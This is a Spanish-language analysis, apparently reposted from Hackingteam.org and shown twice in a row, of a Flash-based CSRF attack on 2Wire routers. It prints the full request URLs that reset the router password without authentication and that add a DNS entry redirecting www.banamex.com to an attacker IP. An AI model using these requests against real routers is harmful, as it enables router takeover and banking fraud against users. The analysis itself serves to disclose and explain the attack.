Vulnerabilidad en routeadores 2Wire
Al hacer clic en cualquier liga mandada al usuario, el usuario es redireccionado hacia un sitio web donde se abre un código FLASH que lleva a cabo el ataque XSRF.
<embed
type="application/x-shockwave-flash"
pluginspage="http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"
name="index"
width="399" height="50"
s0rc="index.swf"
bgcolor="#FFFFFF"
quality="high"
allowscriptaccess="samedomain"
>
<noembed>
</noembed>
</embed>
Del archivo index.swf se obtienen las siguientes cadenas:
http://home/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
http://gateway.2wire.net/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
http://192.168.1.254/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
http://192.168.0.1/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
http://172.16.0.1/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
Aquí se pueden identificar los diversos intentos de llegar al ruteador para reestablecer la contraseña a ?admin?. En el caso de nuestro equipo la URL que tuvo éxito fue la correspondiente a la IP 192.168.1.254.
Cabe señalar que el router contaba con una contraseña del sistema, establecida previamente, después de esta etapa del ataque la contraseña fue sobrescrita.
La página desde donde se sobrescribe la contraseña corresponde al wizard de configuración, por lo que al parecer el sistema no pide autenticación si se pasa como par?metro la nueva contraseña.
La URL del wizard de configuración:
xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38
Las variables de contraseña, confirmación y hint:
&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
A continuaci?n, la misma página espera 5 segundos para enviar la segunda parte del ataque, esto lo realiza a través del siguiente META:
<meta http-equiv="refresh" content="5;url=./postal.html" />
Los 5 segundos de espera tienen la finalidad de esperar a que la primera parte del ataque concluya el reseteo de la contraseña. Después de ese periodo se abre la página postal.html que incluye código para mostrar una animación auténtica y a la vez abrir otra animación FLASH:
<embed
type="application/x-shockwave-flash"
pluginspage="http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"
name="banner"
width="743" height="87"
src="banner.swf"
bgcolor="#FFFFFF"
quality="high"
allowscriptaccess="samedomain"
>
<noembed>
</noembed>
</embed>
<embed
src="http://i.gusanito.com/g/gusanito/cards/4011/card.swf" quality="high"
pluginspage="http://www.macromedia.com/shockwave/download/"
type="application/x-shockwave-flash" width="550"
height="300"></embed>
El archivo banner.swf es el encargado de realizar la segunda parte del ataque y contiene las siguientes cadenas:
http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=65.111.185.95
http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=65.111.185.95
http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=65.111.185.95
En esta etapa se intentan agregar registros de resolución de nombres (DNS) a cada posible dirección donde se encuentra el router potencialmente (home, gateway.2wire.net, 192.168.1.254, 192.168.0.1, etc.), por lo que es posible que en una siguiente versión se llegue a automatizar este comportamiento.
Finalmente se puede verificar en el router comprometido que han sido agregados registros sin conocimiento del usuario:
Fuente: Hackingteam.org
Al hacer clic en cualquier liga mandada al usuario, el usuario es redireccionado hacia un sitio web donde se abre un código FLASH que lleva a cabo el ataque XSRF.
<embed
type="application/x-shockwave-flash"
pluginspage="http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"
name="index"
width="399" height="50"
s0rc="index.swf"
bgcolor="#FFFFFF"
quality="high"
allowscriptaccess="samedomain"
>
<noembed>
</noembed>
</embed>
Del archivo index.swf se obtienen las siguientes cadenas:
http://home/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
http://gateway.2wire.net/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
http://192.168.1.254/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
http://192.168.0.1/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
http://172.16.0.1/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
Aquí se pueden identificar los diversos intentos de llegar al ruteador para reestablecer la contraseña a ?admin?. En el caso de nuestro equipo la URL que tuvo éxito fue la correspondiente a la IP 192.168.1.254.
Cabe señalar que el router contaba con una contraseña del sistema, establecida previamente, después de esta etapa del ataque la contraseña fue sobrescrita.
La página desde donde se sobrescribe la contraseña corresponde al wizard de configuración, por lo que al parecer el sistema no pide autenticación si se pasa como par?metro la nueva contraseña.
La URL del wizard de configuración:
xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38
Las variables de contraseña, confirmación y hint:
&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
A continuaci?n, la misma página espera 5 segundos para enviar la segunda parte del ataque, esto lo realiza a través del siguiente META:
<meta http-equiv="refresh" content="5;url=./postal.html" />
Los 5 segundos de espera tienen la finalidad de esperar a que la primera parte del ataque concluya el reseteo de la contraseña. Después de ese periodo se abre la página postal.html que incluye código para mostrar una animación auténtica y a la vez abrir otra animación FLASH:
<embed
type="application/x-shockwave-flash"
pluginspage="http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"
name="banner"
width="743" height="87"
src="banner.swf"
bgcolor="#FFFFFF"
quality="high"
allowscriptaccess="samedomain"
>
<noembed>
</noembed>
</embed>
<embed
src="http://i.gusanito.com/g/gusanito/cards/4011/card.swf" quality="high"
pluginspage="http://www.macromedia.com/shockwave/download/"
type="application/x-shockwave-flash" width="550"
height="300"></embed>
El archivo banner.swf es el encargado de realizar la segunda parte del ataque y contiene las siguientes cadenas:
http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=65.111.185.95
http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=65.111.185.95
http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=65.111.185.95
En esta etapa se intentan agregar registros de resolución de nombres (DNS) a cada posible dirección donde se encuentra el router potencialmente (home, gateway.2wire.net, 192.168.1.254, 192.168.0.1, etc.), por lo que es posible que en una siguiente versión se llegue a automatizar este comportamiento.
Finalmente se puede verificar en el router comprometido que han sido agregados registros sin conocimiento del usuario:
Fuente: Hackingteam.org